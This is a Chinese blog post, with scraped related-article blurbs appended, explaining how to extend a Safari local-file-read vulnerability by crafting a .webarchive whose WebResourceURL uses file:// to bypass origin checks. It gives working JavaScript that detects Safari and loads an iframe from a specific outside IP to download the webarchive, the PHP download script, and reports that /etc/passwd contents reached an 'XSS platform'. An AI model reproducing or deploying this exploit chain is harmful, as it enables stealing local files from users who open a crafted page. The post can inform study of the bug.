ipad safari php readfile mp4,safari本地文件读取漏洞之扩展攻击面

最新推荐文章于 2024-07-30 16:01:33 发布
最新推荐文章于 2024-07-30 16:01:33 发布
阅读量85 收藏
点赞数
文章标签: ipad safari php readfile mp4

近几日爆出了safari对本地html文件js处理不当,导致可以读取本地文件

发现漏洞还是比较鸡肋的,因为safari会识别html文件的来源,一般的网络传输都会给加上来源信息,这样safari就不会在xhr使用file读取本地文件。

作者给出了exp以及利用方法:使用u盘等硬媒介传输,或者使用应用层以下的协议传输,比如telegram的文件传输功能。

但是有没有办法抹除或不添加来源信息呢?

1. 可以使用压缩包打包poc文件,这样添加来源头的是压缩文件,而不是内部文件, 就可以直接执行poc。(但是这样显得比较臃肿)

2. 想办法构造与file协议同源。

我们发现其实作者已经提到了一点,但是没有更好的利用到,.webarchive 文件,里面是xml的结构,只能由safari进行解析,其中里面的WebResourceURL属性,safari将其识别为当前资源所使用的协议,也就是我们可以在这里构造‍‍file://

这样就可以绕过对文件源的检测。‍‍‍‍

cdb947169e55fcbf0c016adc1afb97ff.png

本地测试一下,成功x到/etc/passwd的内容。

但是在mac下运行的时候会弹出安全提示,而且这个后缀名不是很常见,有没有更好的办法呢?

经过测试发现刚下载好的.webarchive 文件,在safari用file协议直接打开是可以运行的,而且没有安全提示。

于是思路就有了:

构造一个html文件,首先在远程服务器下载webarchive文件,利用js location跳转到该文件,即可执行poc。(有缺点:webarchive文件绝对路径因为用户名的关系不固定,但是如果使用mac一般都是下载到同一个文件里,用相对路径即可)

js文件:

function myBrowser(){

var userAgent = navigator.userAgent;

var isOpera = userAgent.indexOf("Opera") > -1;

if (isOpera) {

return "Opera"

};

if (userAgent.indexOf("Firefox") > -1) {

return "FF";

}

if (userAgent.indexOf("Chrome") > -1){

return "Chrome";

}

if (userAgent.indexOf("Safari") > -1) {

return "Safari";

}

if (userAgent.indexOf("compatible") > -1 && userAgent.indexOf("MSIE") > -1 && !isOpera) {

return "IE";

};

}

function exp(){

var iframe2 = document.createElement('iframe');

iframe2.src="./test.webarchive";

document.body.appendChild(iframe2);

// setTimeout("location.reload()",1000);

}

var mb = myBrowser();

if (mb == "Safari") {

var iframe = document.createElement('iframe');

iframe.src="http://123.206.216.198/down.php";

document.body.appendChild(iframe);

setTimeout("exp()",1500);

}

else

{

    document.write('Please use Safari  to open the html file')

}

down.php

function downfile()

{

filename=realpath("test.webarchive");date=date("Ymd-H:i:m");

Header( "Content-type: application/octet-stream ");

Header( "Accept-Ranges: bytes ");

Header( "Accept-Length: " .filesize(filename));  header( "Content-Disposition: attachment; filename= test.webarchive");  readfile(filename);

}

downfile();

?>

最终的html:

test hahaha

d1ba8dda70c70d719a3e50e549f4e864.png

用safari打开后

1a3c8a7978c5abccd8ff1636fe2157ee.png

看一下xss平台:

892eb1c21e9379ca1c3523f685487128.png

直接x到了,xd 🙂

提供个html下载地址:

weixin_39939668
关注
OfficeWeb365 Readfile 任意文件读取漏洞复现
0xSec
02-03 662
OfficeWeb365 Readfile接口处存在任意文件读取漏洞攻击者可通过此漏洞对payload进行base64编码,读取任意文件,获取服务器敏感信息,使系统处于极不安全的状态。
Safari访问本地html,safari本地文件读取漏洞扩展攻击面 | CN-SEC 中文网
weixin_35057804的博客
06-20 478
摘要这样就可以绕过对文件源的检测。 本地测试一下,成功x到/etc/passwd的内容。但是在mac下运行的时候会弹出安全提示,而且这个后缀名不是很常见,有没有更好的办法呢?经过测试发现刚下载好的.webarchive 文件,在safari用file协议直接打开是可以运行的,而且没有安全提示。于是思路就有了:构造一个html文件,首先在远程服务器下载webarchive文件,利用js l...
safari 获取视频流_如何在Safari中将RSS feed和社交媒体合并为一个流
cum43546的博客
09-21 550
safari 获取视频流Safari allows you to subscribe to RSS feeds and add your social media accounts so you can view them right in the browser, in one universal feed, without the need of any add-on applications...
ipad safari php readfile mp4,使用iris实现safari浏览器中使用video标签浏览mp4的功能
weixin_39621774的博客
03-23 188
最近在实现一款小程序时,使用到了视频在线播放的功能,由于资金紧张,所以没有采用第三方云存储的方案,而是将视频文件通过文件上传的功能保存在了自己服务器的磁盘上,而查看时,使用iris的sendFile方法将视频文件输入到response中给前台,而这一方法在chrome浏览器中使用video的方法测试没有任何问题,然后发布小程序,在安卓手机上查看也没发现问题,但是在safari上或者iphone手机...
任意文件读取漏洞复现
来日可期的博客
08-31 4186
任意文件上传漏洞指的是攻击者可以通过绕过应用程序的文件上传功能,向服务器上传恶意文件,包括脚本文件、木马程序等,从而执行任意代码或获取系统敏感信息。
从0到1 CTFer成功之路》任意文件读取漏洞---学习笔记
aweiname2008的博客
08-08 5119
1.3 任意文件读取漏洞 所谓文件读取漏洞,就是攻击者通过一些手段可以读取服务器上开发者不允许读到的文件。从整个攻击过程来看,它常常作为资产信息搜集的一种强力的补充手段,服务器的各种配置文件文件形式存储的密钥、服务器信息(包括正在执行的进程信息)、历史命令、网络信息、应用源码及二进制程序都在这个漏洞触发点被攻击者窥探。 文件读取漏洞常常意味着被攻击者的服务器即将被攻击者彻底控制。当然,如果服务器严格按照标准的安全规范进行部署,即使应用中存在可利用的文件读取漏洞攻击者也很难拿到有价值的信息。文件读取漏洞
safari下载文件自动加了html后缀问题
10-17
`file()`函数则用于将文件的每一行读取到数组中,适合于处理较大的文件,因为这样不会占用过多的内存。 需要注意的是,本文最后提到的内容中,由于OCR扫描文档时的技术限制,可能个别字识别存在错误或漏识别的情况...
天问智慧物业ERP多处接口存在任意文件读取漏洞
m0_46604997的博客
07-30 423
成都天问互联科技有限公司以软件开发和技术服务为基础,建立物业ERP应用系统,向物管公司提供旨在降低成本、保障品质、提升效能为目标的智慧物管整体解决方案,实现物管公司的管理升级;以平台搭建和资源整合为基础,建立社区O2O服务平台,向物管公司提供旨在完善服务、方便业主、增加收益为目标的智慧小区综合服务平台,实现物业公司的服务转型。
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452)
thelostworld
07-23 1193
CISCO ASA任意文件读取漏洞复现 (CVE-2020-3452) 一、漏洞描述: Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的web管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞攻击者只能查看web目录下的文件,无法通过该漏洞访问web目录之外的文件。该漏洞可以查看webVpn设备的配置信息,cookies等。 二、影响范围 以下是CVE-2020-3452漏洞受.
科荣 AIO ReadFile 任意文件读取(含批量验证poc)
weixin_43567873的博客
04-08 77
科荣 AIO ReadFile 任意文件读取(含批量验证poc)
php 输出视频流无法被video显示,修复video标签在safari中无法播放mp4视频的问题
weixin_42367464的博客
03-12 625
前言近期一个站长联系我,向我求救解决一个bug,该问题在网络上很多遇到,但是没有正常的解决方案。特此记录下。问题该站长有一个discuz论坛,其中在帖子中发布视频时,如果添加的视频地址是其他站点的地址或者图片下的视频路径,可以正常播放。如果使用附件中地址,则异常。image.png其中无法播放的地址的代码如下原因safari浏览器,在打开视频的时候,他不是一次性请求全部文件的,一般首先会请求0-1...
CISCO ASA设备任意文件读取漏洞复现 (CVE-2020-3452)
墨痕诉清风的博客
10-08 2911
Cisco Adaptive Security Appliance (ASA) 防火墙设备以及Cisco Firepower Threat Defense (FTD)设备的WEB管理界面存在未授权的目录穿越漏洞和远程任意文件读取漏洞,允许未经身份验证的远程攻击者进行目录遍历攻击读取目标系统上的敏感文件,此漏洞不能用于获取对ASA或FTD系统文件或底层操作系统(OS)文件的访问,所以只能读取web系统目录的文件,比如webvpn的配置文件、书签、网络cookies、部分网络内容和超文本传输协议网址等信息。.
c#实现俄罗斯方块,面向对象实现
09-15
俄罗斯方块(Tetris)是一款经典的益智游戏,由俄罗斯程序员阿列克谢·帕基特诺夫于1984年开发。游戏的主要目标是通过旋转和移动不同形状的方块(称为“砖块”或“Tetrominoes”),将它们填充到屏幕底部的水平行中。当一行被完全填满时,该行会消失,玩家将获得积分。 游戏特点: 砖块形状:游戏中有七种不同形状的砖块,每种砖块由四个方块组成。 下落机制:砖块从屏幕顶部逐渐下落,玩家需要快速做出决策。 得分系统:消除的行越多,得分越高,连续消除多行会获得额外分数。 难度递增:随着游戏进行,砖块下落的速度会逐渐加快,增加了游戏的挑战性。 文化影响: 俄罗斯方块不仅在游戏界取得了巨大的成功,还成为了流行文化的一部分,影响了许多后续的游戏设计。它的简单性和上瘾性使其成为了历史上最畅销的电子游戏之一。 版本与平台: 自发布以来,俄罗斯方块已经在多个平台上推出,包括家用游戏机、电脑、手机等,形成了众多不同的版本和变种。
5G网络优化案例:关于解决诺基亚5G 700M站点小区闪断问题解决.pdf
最新发布
09-15
这份文件是关于解决诺基亚5G 700M站点小区闪断问题的详细案例报告,主要内容和关键要点如下: 问题背景与初步分析: 问题描述:随着5G 700M网络建设的推进,诺基亚700M现网出现较多误码告警和小区闪断问题,故障比例明显高于其他厂家站点。 初步定位:通过归类法分析,发现绝大部分误码问题发生在烽火单芯双向光模块小区,占比高达95.65%。 故障根因深入探究: 光模块适配问题:初步认为烽火单纤双向光模块存在问题,但更换后问题依旧,进一步分析为光模块与诺基亚设备的适配问题。 深入测试与定位:选取5个长期误码小区进行深入分析,与烽火厂家合作对光模块进行程序升级,问题得到初步解决。 AUTOBYPASS机制分析: 机制介绍:烽火光模块采用25G模块速率兼容10G,并开启AUTOBYPASS(CPR自动旁路模式)功能。 影响分析:AUTOBYPASS机制与诺基亚设备不适配,导致交互失败和误码产生。关闭AUTOBYPASS后,CDR时钟校验和恢复周期缩短,交互频繁,误码问题消失。 解决方案与实施: 解决方案:针对所有使用此类光模块的诺基亚站点,通过优化升级烽火光模块,关闭AUTOBYPASS功
在线请假管理系统.zip
09-15
这是一个基于Python Flask的Web应用程序,采用Bulma uI框架和Postgresql数据库,用于管理和处理员工的请假事宜。用户可以通过这个系统创建安全的用户账户并登录,员工可以提交请假申请等待上级审批,并查看历史请假记录。经理可以审批或拒绝员工的请假申请,并查看团队的请假记录。此外,管理员还可以查看所有员工信息,添加新员工并分配经理,编辑和删除员工信息。该项目在heroku上托管,提供在线服务。安装步骤包括克隆项目、创建虚拟环境、激活环境并安装依赖项等。还提供了数据库迁移和初始化、运行应用程序以及数据重置等实用工具命令。 1、资源项目源码均已通过严格测试验证,保证能够正常运行; 2、项目问题、技术讨论,可以给博主私信或留言,博主看到后会第一时间与您进行沟通; 3、本项目比较适合计算机领域相关的毕业设计课题、课程作业等使用,尤其对于人工智能、计算机科学与技术等相关专业,更为适合; 4、下载使用后,可先查看README.文md件(如有),本项目仅用作交流学习参考,请切勿用于商业用途。
PHP文件读取与操作类库实例
- 类中没有直接展示的文件读取方法,但我们可以推测存在类似`readFile()`或`processFile()`的方法,这些方法可能利用PHP文件流函数(如`fopen()`, `fgets()`, `fclose()`)来分块读取文件内容,以处理大文件。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值